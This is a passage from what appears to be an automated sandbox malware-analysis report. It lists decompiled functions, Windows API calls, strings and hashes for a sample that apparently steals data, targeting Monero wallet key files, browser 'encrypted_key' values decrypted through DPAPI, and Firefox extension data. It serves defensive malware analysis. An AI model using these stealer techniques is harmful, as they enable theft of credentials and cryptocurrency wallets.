                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: e0c95f89bdeeebbd03d3650d01f989bd9cbca9cea3819e2990a1b206d749a697
                                • Instruction ID: ee4ffaa7d9f80ffcb2568d9cd46caf96091d4a893a60e56ec815e1609b34ca5e
                                • Opcode Fuzzy Hash: e0c95f89bdeeebbd03d3650d01f989bd9cbca9cea3819e2990a1b206d749a697
                                • Instruction Fuzzy Hash: 163107B2801218ABDB14EB94DD96FDEB778EF04300F804189F20967191DF746A49CFBA
                                Function 00D987C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00DA0E28,00000000,?), ref: 00D9882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D98836
                                • wsprintfA.USER32 ref: 00D98850
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 9853303521b8ae35abc97c83e64078fd3b25fe1e35d6e02afb89e0f42f7e963f
                                • Instruction ID: 0a039102b3aeb709c57ecc8dfac5a00c8cf9be88a796e241261150072d363e42
                                • Opcode Fuzzy Hash: 9853303521b8ae35abc97c83e64078fd3b25fe1e35d6e02afb89e0f42f7e963f
                                • Instruction Fuzzy Hash: 1421FEB1E4020CAFDB04DF94DE46FAEBBB8FB48715F104119F615A7280C779A9019BA1
                                Function 00D98D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D9951E,00000000), ref: 00D98D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D98D62
                                • wsprintfW.USER32 ref: 00D98D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: a99f365cf6bf53ffccaa33ab3d6ff2d52822ec1a4c75a811628922fed4b8b20a
                                • Instruction ID: 3f775f4e1b3f182d72113115c2655e340d235ecbc8b382b8a35eec2b6d0cd003
                                • Opcode Fuzzy Hash: a99f365cf6bf53ffccaa33ab3d6ff2d52822ec1a4c75a811628922fed4b8b20a
                                • Instruction Fuzzy Hash: 50E08670A4020CBFD700DB94DD0AE5977B8EB04705F000054FD0987280D9716E009B66
                                Function 00D8A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D8A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00D8A3FF
                                • lstrlen.KERNEL32(00000000), ref: 00D8A6BC
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00D8A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 608e5e2796fe59e2628d241812231a61dc0b00d5534907b13c9ac136fc205d06
                                • Instruction ID: c229c283cdb1be5cbf2127c4e11487f7f1bbd3cd7f58a341ac939967314d0430
                                • Opcode Fuzzy Hash: 608e5e2796fe59e2628d241812231a61dc0b00d5534907b13c9ac136fc205d06
                                • Instruction Fuzzy Hash: 53E1BB73820118AADF05FBA8DD92EEE7338EF54300F508169F51676091EE346A4DDBB6
                                Function 00D8D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D8D481
                                • lstrlen.KERNEL32(00000000), ref: 00D8D698
                                • lstrlen.KERNEL32(00000000), ref: 00D8D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00D8D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 7c9edd23d3594b96ac23d06ad67a1a071f37a7bd60aa0871cf324b730752156c
                                • Instruction ID: 651b1dae39db0cfcba11b98ed1010d876fde0cdffccabd7c889909727fc79729
                                • Opcode Fuzzy Hash: 7c9edd23d3594b96ac23d06ad67a1a071f37a7bd60aa0871cf324b730752156c
                                • Instruction Fuzzy Hash: F591D873920118ABDF04FBA8DD96EEE7338EF14304F504169F516A6091EF346A09DBB6
                                Function 00D8D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D8D801
                                • lstrlen.KERNEL32(00000000), ref: 00D8D99F
                                • lstrlen.KERNEL32(00000000), ref: 00D8D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00D8DA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 16b07078e27d77f5f72987aa9dced1a1f4f6a30e2db2d16c9a782aa6f726eedd
                                • Instruction ID: fc5bf7356231f4abc5c9edc2a736f15daa44cacd9161d384a6094f77e1db9792
                                • Opcode Fuzzy Hash: 16b07078e27d77f5f72987aa9dced1a1f4f6a30e2db2d16c9a782aa6f726eedd
                                • Instruction Fuzzy Hash: 7181D873920118ABDF04FBA8DD96EEE7339EF14304F504569F506A6091EE346A09DBB2
                                Function 00D8F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00DA1580,00DA0D92), ref: 00D8F54C
                                • lstrlen.KERNEL32(00000000), ref: 00D8F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: dd8b1754abc915fe849e947725eea5c72419c6bcc44f158fc055fc291dc0d6bd
                                • Instruction ID: dc544afe6fe8a25f2b265e7f76d8ab8bf525a8a413004b39aea227b9c42ee7df
                                • Opcode Fuzzy Hash: dd8b1754abc915fe849e947725eea5c72419c6bcc44f158fc055fc291dc0d6bd
                                • Instruction Fuzzy Hash: 0F51DB76D10118AADF04FBA8DC96DED7779EF54300F408529F816A7191EE346A09CBF2
                                Function 00D93560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: bca8c77dbcf9041a32af979cc495edae95b34f80e943e314189b1f9921472068
                                • Instruction ID: d1c19d065b306d9393c8fb7b6621d72cd92a7cd016aaaae3d550d79ba2408e63
                                • Opcode Fuzzy Hash: bca8c77dbcf9041a32af979cc495edae95b34f80e943e314189b1f9921472068
                                • Instruction Fuzzy Hash: 4E41FB72D10109AFCF04EFE8D946AEEB7B4EF54704F148418E51676290DB75AA09CBB2
                                Function 00D89CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D89D39
                                  • Part of subcall function 00D89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89AEF
                                  • Part of subcall function 00D89AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D84EEE,00000000,?), ref: 00D89B01
                                  • Part of subcall function 00D89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89B2A
                                  • Part of subcall function 00D89AC0: LocalFree.KERNEL32(?,?,?,?,00D84EEE,00000000,?), ref: 00D89B3F
                                  • Part of subcall function 00D89B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D89B84
                                  • Part of subcall function 00D89B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00D89BA3
                                  • Part of subcall function 00D89B60: LocalFree.KERNEL32(?), ref: 00D89BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: d97be5f81a7d3d7b601ee21ba12cd0a32a601c606da4cc74234ad40a65eadfa3
                                • Instruction ID: 6657c0c788a701ea204e653f586d4613190a4b8dfc03a602dcac52304a65a7d9
                                • Opcode Fuzzy Hash: d97be5f81a7d3d7b601ee21ba12cd0a32a601c606da4cc74234ad40a65eadfa3
                                • Instruction Fuzzy Hash: 563110B6D10109ABCF04EBE4DC96AFEB7B8EF48304F184519E905A7241E7359A04CBB5
                                Function 00D992E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00D93AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00D93AEE,?), ref: 00D992FC
                                • GetFileSizeEx.KERNEL32(000000FF,00D93AEE), ref: 00D99319
                                • CloseHandle.KERNEL32(000000FF), ref: 00D99327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
